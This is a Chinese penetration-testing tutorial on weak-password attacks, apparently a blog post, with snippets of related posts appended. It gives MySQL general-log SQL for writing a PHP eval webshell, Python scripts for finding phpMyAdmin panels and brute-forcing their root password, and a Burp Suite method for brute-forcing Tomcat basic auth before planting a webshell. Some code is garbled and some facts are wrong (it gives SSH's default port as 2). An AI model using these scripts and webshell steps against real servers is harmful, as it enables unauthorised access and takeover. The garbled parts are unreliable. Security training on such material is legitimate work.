滲透測試學習23 弱口令高階

2021-10-22 11:52:25 字數 2617 閱讀 7649

tomcat(輕量級伺服器)爆破

可以收集一些別的師傅的(github找),自己在滲透實戰後也應該總結字典。

有時資訊收集時可以得到mysql路徑(mysql預設埠3306),於是我麼可以嘗試爆破得到mysql管理賬號密碼。

爆破工具:

爆破得到密碼後可以嘗試寫shell,提權等操作。

寫shell:有絕對路徑並且有寫許可權時可以直接寫入;也可以嘗試日誌寫入。

set global general_log = "on";

set global general_log_file='c:/wamp64/www/ma.php';

//之後再寫入一句話木馬

select <?php eval($_post[cmd]);?>

提權將在內網篇中詳講。

有時資訊收集時可以得到rdp路徑(rdp預設埠3389),於是我麼可以嘗試爆破rdp嘗試獲取遠端桌面賬號密碼。

不過一般不使用爆破rdp,原因:速度慢,動作大,易被反查。這裡我們只是說一種思路。

有時資訊收集時可以得到ssh路徑(ssh預設埠2),於是我麼可以嘗試爆破ssh嘗試獲取遠端登入賬號密碼。

這裡也是用上面那幾個介紹的工具。

具體的使用可以看各類實戰性點之基於phpmyadmin

這裡只介紹爆破賬號和密碼。

傳統的使用burpsuite是不行了的,因為每次請求的token是⼀樣的話,結果也會每次都⼀樣的,所以我們可以自己編寫爆破指令碼。

判斷乙個**是否有phpmyadmin後台(關鍵字判斷法):

網頁中存在如下關鍵字即可判斷存在phpmyadmin後台

歡迎使用 phpmyadmin 判斷**

def run(url):

try://異常處理之執行如下**

r = requests.get(url,timeout=20)//get方法請求url

print('{} : {}'.format(r.url,r.status_code))//列印url和狀態碼

if b'documentation.html' in r.content://如果特殊語句存在在響應包中

with open('phpmyadmin_url.txt', 'a+')as a://以a+(讀寫)方式開啟檔案

a.write(r.url + '\n')//寫入url+換行

except://異常處理之發生異常的結果如下

pass

if __name__ == '__main__':

run('')//測試如下url

何判斷是否登陸成功(關鍵字判斷法):

登入成功響應包中有:

phpmyadmin 更適合在支援

phpmyadmin

mainframeset

**如下:

def scan(url,passwords):

for password in passwords:

data =

# 組成傳送的資料報

try:

r = requests.post(url,data=data)

print(f'當前爆破使用者名稱 root:')

# 發起請求,嘗試登陸

if b'mainframeset' in r.content:

print('爆破成功')

with open('success.txt','a+')as a:

a.write(url+'|root|'+password+'\n')

return

# 成功的會儲存到目錄的success.txt文字中

# 然後return的功能是退出函式

except:

pass

if __name__ == '__main__':

passwords = ['mysql','123456','root1234','root']

scan('',passwords)

tomcat 伺服器是⼀個免費的開放源**的web 應⽤伺服器中介軟體,屬於輕量級應⽤伺服器,在中小型系統和併發訪問⽤⼾ 不是很多的場合下被普遍使⽤,是開發和除錯jsp 程式的首選。tomcat就是apache的拓展。

驗證方式:主要是基本驗證(401驗證)就是把賬號密碼進⾏base64編碼後作為http頭中authorization的值傳⼊伺服器進⾏解析認證

在滲透中的作用:

tomcat存在後台(8080是tomcat的預設埠),我們找到後可以嘗試暴力破解賬號和密碼(預設賬號和密碼都是tomcat)。

暴力破解:burpsuite

登入資料報含有:

authorization: basic dg9ty2f0onrvbwnhda==
dg9ty2f0onrvbwnhda==經過base64解密得到tomcat:tomcat即賬號+:+密碼的格式,所以我們在使用burp爆破時應選擇custom iterator,payload1選擇賬號,payload2選擇:,payload3選擇密碼,之後再選擇base64加密選項。

爆破上去之後如果許可權夠可以寫webshell(預設最高許可權)。

Oracle弱口令的常見滲透流程 滲透五部曲

1.nmap 掃瞄開放的常見埠,nmap4.9版本已經支援oracle tns 版本探測,可以方便的知道oracle版本資訊 2.查詢sid資訊,可以通過訪問isqlplus,使用賬戶dbsnmp dbsnmp 來登入 這裡oracle設計的isqlplus有乙個bug 可以不需要輸入sid資訊來登...

滲透測試學習筆記 初識滲透測試

黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...

Sql Server的弱口令入侵測試以及防範

我之所以要做這樣的測試是因為這一切都是有背景的!被黑客黑的代價!傷心ing。物理機 win7 虛擬機器 xp 掃瞄工具 我想我最好不寫掃瞄器的名字比較好 密碼之所以是123456是因為前一陣子做sql server的分布式資料庫的實驗,然後就把密碼弄得很簡單。物理機上似乎好像感覺有很多漏洞呀呀呀呀呀...